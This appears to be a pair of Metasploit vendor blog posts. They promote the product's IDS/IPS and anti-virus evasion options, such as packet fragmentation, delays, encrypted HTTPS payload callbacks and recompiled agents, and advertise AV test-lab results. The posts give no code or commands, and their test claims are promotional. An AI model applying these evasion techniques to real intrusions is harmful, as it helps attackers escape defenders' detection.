Metasploit has many different settings to evade an IDS/IPS (intrusion detection system/intrusion prevention system). Metasploit Framework lets you set many of these manually, for example changing the transport type, the encoding, or fragmenting traffic. Finding the right setting to evade a given IPS can be a little tricky. If you want to make your life easier, you can use Metasploit Pro's pre-defined levels of evasion: Transport Evasions and Application Evasions, each with the options None, Low, Medium, and High. In the back end, the tuning differs for each type of exploit. For example, at Low transport evasion the exploit runs a little slower and is chunked into more segments. With the higher options, exploit-specific settings change, like the compression type, the name of the web server, or the use of different Unicode encodings. You can set these IDS/IPS evasion settings in the Advanced Options of the Exploitation screen:
Concurrent exploits: The number of exploits launched at your targets at the same time. Reduce this to ensure the attack doesn't raise any red flags.
Transport evasion: Sends smaller TCP packets and increases the time delay between packets to avoid detection.
Application evasion: Adjusts application-specific evasion options for exploits involving DCERPC, SMB and HTTP. The higher the setting, the more evasion techniques are applied.

Social engineering

When choosing the payload for social engineering campaigns, choose Encrypted HTTPS to ensure that your payload phones back over an encrypted session; these are harder for an IDS/IPS to detect. Social engineering campaigns are only available in Metasploit Pro.

Avoiding anti-virus

Even if you get past the IDS/IPS on the network, the anti-virus engine on the machine you're trying to exploit may stop your attack if you're not careful. Many AV vendors flag Metasploit exploits and payloads as malware because they can be used in an attack. That is also why you shouldn't have a malware scanner installed on the machine you run Metasploit on; otherwise it may block your installation or your exploits. If you must install an AV solution, make sure you have excluded the Metasploit directory from its scans. Metasploit includes various ways to avoid anti-virus detection, which again differ between editions. Metasploit Framework and Metasploit Community share the same basic AV evasion. Metasploit Express adds a self-signed binary and templates to evade detection by anti-virus solutions. Metasploit Pro includes a Rapid7-signed binary to inject code that bypasses a whitelist, and a persistent agent that is compiled differently every time, making it very hard to detect. To get an impression of how successful Metasploit is in evading anti-virus, check out the results from our test lab in the blog post "Become invisible to anti-virus protection". How are your defenses holding up to advanced evasion techniques? Download Metasploit and register for a free Metasploit Pro trial today.

Become invisible to anti-virus protection


Wouldn't it be fantastic to be invisible for a day? Walk straight into a bank vault in the morning, be a fly on the wall in the Oval Office for lunch, and spend an evening in your favorite movie star's house. Well, now you can - with Metasploit! We tested our Metasploit invisibility cloak on a field day recently. Our venue of choice: an anti-virus test lab. The goal was to test how well Metasploit's anti-virus evasion would hold up against the most recent versions of the world's top ten anti-virus vendors. The results were better than we had hoped for: Every single vendor had gaping holes, and two didn't trigger alerts at all. I don't want to single out specific vendors, so I've anonymized the chart. In addition, exploit developers and anti-virus engines are in a constant arms race, so I don't want to disclose how we make our exploits invisible. Otherwise, the AV vendors would fix the holes, my colleagues in development would have to code through the weekend, and I would have to buy them a beer next time. Instead, they're now working on making Metasploit Pro completely invisible. If you're interested in Metasploit and anti-virus, also check out n00bznet's recent blog post on the subject.
